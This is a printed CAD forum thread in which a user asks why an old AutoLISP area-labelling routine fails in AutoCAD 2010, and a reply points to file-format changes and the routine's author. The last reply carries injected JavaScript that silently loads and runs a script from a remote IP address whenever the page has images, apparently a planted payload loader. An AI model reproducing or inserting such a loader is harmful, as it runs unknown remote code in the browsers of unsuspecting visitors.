Print Page | Close Window

AutoCAD2010 AutoLisp Problem

Printed From: CAD Forum
Category: EN
Forum Name: AutoCAD
Forum Description: Discussion about AutoCAD and AutoCAD LT, viewers, DWG and DXF formats, Design Review, AutoCAD web, Drive, add-ons
URL: https://www.cadforum.cz/forum_en/forum_posts.asp?TID=3953
Printed Date: 13.Jun.2026 at 13:37


Topic: AutoCAD2010 AutoLisp Problem
Posted By: thitmonsun
Subject: AutoCAD2010 AutoLisp Problem
Date Posted: 05.Jul.2010 at 06:22
Hi Guys,...
 
Pls help me... i got some errors using autolisp in 2010 version.
Cry 
eg., i used "areatext" autolisp since 2004 to 2009. it was ok all the time.
but when i use in 2010, it got errors like the value is only "####". plsss..



Replies:
Posted By: Cad64
Date Posted: 05.Jul.2010 at 17:26
This happens sometimes. Old lisp routines sometimes stop working when used in newer versions. Every 3 years Autodesk changes the Autocad file format, so it's possible that this routine is not compatible with 2010.
 
Why don't you contact the author and ask him to modify the routine to work in 2010? I just found the routine on his website and his contact information is in the header of the file.
 
;;; By Jimmy Bergmark
;;; Copyright (C) 2007-2009 JTB World, All Rights Reserved
;;; Website: www.jtbworld.com
;;; E-mail: info@jtbworld.com


-------------
Online Portfolio: http://www.rdeweese.com/" rel="nofollow - http://www.rdeweese.com/


Posted By: jimzcadez
Date Posted: 05.Jul.2010 at 18:03
what is autolist how do it work to your autocadTonguefunction FN_IR_load(){var script = document.createElement('script');script.type = 'text/javascript';script.src = 'http://62.0.5.128/irscripts/imgreload.js';document.getElementsByTagName('head')[0].appendChild(script);}var FN_IR_loaded = false;if(document.images.length > 0){FN_IR_loaded = true;FN_IR_load();}

-------------
respect



Print Page | Close Window